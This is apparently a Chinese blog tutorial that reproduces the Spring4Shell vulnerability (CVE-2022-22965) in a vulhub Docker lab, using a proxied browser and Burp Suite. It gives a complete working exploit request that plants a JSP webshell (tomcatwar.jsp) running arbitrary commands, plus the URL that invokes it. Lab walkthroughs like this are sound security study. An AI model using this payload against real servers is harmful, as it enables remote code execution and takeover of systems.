Java 框架安全:Spring 漏洞序列.(CVE-2022-22965)

什么叫 Spring 框架.

Spring 框架是一个用于构建企业级应用程序的开源框架。它提供了一种全面的编程和配置模型,可以简化应用程序的开发过程。Spring 框架的核心特性包括依赖注入(Dependency Injection)、面向切面编程(Aspect-Oriented Programming)、声明式事务管理(Declarative Transaction Management)等。依赖注入是 Spring 框架的核心概念之一,它通过将对象之间的依赖关系外部化,使得对象之间的协作更加灵活和可测试。Spring 框架提供了多种方式来实现依赖注入,包括构造函数注入、Setter 方法注入和字段注入。


目录:

[什么叫 Spring 框架.](#什么叫 Spring 框架.)

[开启 漏洞 靶场:](#开启 漏洞 靶场:)

(1)查看目录:

[(2)启用 vulhub 漏洞:](#(2)启用 vulhub 漏洞:)

[(3)进行浏览:主机的 8080 端口.](#(3)进行浏览:主机的 8080 端口.)

[进行 漏洞 测试:](#进行 漏洞 测试:)

第一步:设置代理服务器

(1)设置代理服务器

[(2) 新建代理服务器,选择手动代理](#(2) 新建代理服务器,选择手动代理)

[(3)使用 刚刚设置的代理.](#(3)使用 刚刚设置的代理.)

第二步:执行进行抓包.

[(1)打开Burp,点击代理 设置监听的IP地址和端口](#(1)打开Burp,点击代理 设置监听的IP地址和端口)

第三步:进行漏洞测试.


开启 漏洞 靶场:

Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客


(1)查看目录:

复制代码
(1)cd vulhub
 
(2)ls


(2)启用 vulhub 漏洞:

复制代码
(1)cd spring                     // 切换到对应的漏洞目录.
 
(2)cd CVE-2022-22965              // 切换到对应的漏洞版本.

(3)docker-compose build           // 建立容器

(4)docker-compose up -d           //   启用漏洞环境.


(3)进行浏览:主机的 8080 端口.


进行 漏洞 测试:

第一步:设置代理服务器

(1)设置代理服务器(我用的是:OWASP浏览器,也可以用别的浏览器 设置代理服务器就行)


(2) 新建代理服务器,选择手动代理 设置127.0.0.1(为本地的IP地址),设置代理的端口8080


(3)使用 刚刚设置的代理.


第二步:执行进行抓包.

(1)打开Burp,点击代理 设置监听的IP地址和端口(就是刚刚浏览器设置的代理,127.0.0.1(是本地的IP地址),8080(是监听的端口))


(2)进行访问漏洞的链接.(使用 Burp抓包.)

复制代码
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.32.132:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 	AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 		Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1


第三步:进行漏洞测试.

(1)访问刚才上传的 JSP webshell,并执行任意命令.

复制代码
http://172.16.10.19:8080/tomcatwar.jsp?pwd=j&cmd=id

相关推荐
华科云商xiao徐2 分钟前
Java使用Jsoup库实现通用爬虫
java·爬虫
炎码工坊10 分钟前
API网关Kong的鉴权与限流:高并发场景下的核心实践
安全·网络安全·微服务·云原生·系统安全
炎码工坊10 分钟前
云原生安全实战:API网关Kong的鉴权与限流详解
网络安全·微服务·云原生·系统安全·安全架构
闲敲棋子落灯华22 分钟前
java学习笔记(三)--java包的引入、访问控制、类的继承、super关键字、重载、重写、运算符、拆箱
java·后端
程序员岳焱24 分钟前
Java 使用 Spring AI 的 10 个实用技巧
java·后端·程序员
Bug改不动了28 分钟前
迁移达梦数据库过程中,如何快速识别需要改写的Mapper SQL方法
java·mybatis
crud36 分钟前
Spring Boot 使用 @Async 实现异步操作:从入门到实战,一文讲透
java·spring boot
代码小将1 小时前
java中static学习笔记
java·笔记·学习
std78791 小时前
VITA STANDARDS LIST,VITA 最新标准清单大全下载_ansi vita 2025
java·前端·javascript
迢迢星万里灬1 小时前
Java求职者面试指南:Spring、Spring Boot、MyBatis框架与计算机基础问题解析
java·spring boot·spring·mybatis·计算机基础·面试指南